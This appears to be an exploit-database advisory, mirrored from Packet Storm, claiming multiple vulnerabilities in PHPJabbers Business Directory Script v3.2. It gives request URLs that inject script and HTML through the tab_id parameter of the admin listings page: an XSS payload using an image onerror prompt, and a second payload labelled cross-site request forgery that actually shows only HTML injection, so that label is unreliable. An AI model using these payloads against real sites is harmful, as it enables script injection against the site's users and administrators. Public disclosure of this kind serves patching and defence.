Share
## https://sploitus.com/exploit?id=PACKETSTORM:174264
# Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities  
# Date: 09/08/2023  
# Exploit Author: Kerimcan Ozturk  
# Vendor Homepage: https://www.phpjabbers.com/  
# Software Link: https://www.phpjabbers.com/business-directory-script/  
# Version: 3.2  
# Tested on: Windows 10 Pro  
## Description  
  
Technical Detail / POC  
==========================  
Login Account  
Go to Property Page (  
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)  
Edit Any Property (  
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57  
)  
  
[1] Cross-Site Scripting (XSS)  
  
Request:  
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=  
"<script><image/src/onerror=prompt(8)>  
  
[2] Cross-Site Request Forgery  
  
Request:  
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=  
"<script><font%20color="green">Kerimcan%20Ozturk</font>  
  
Best Regards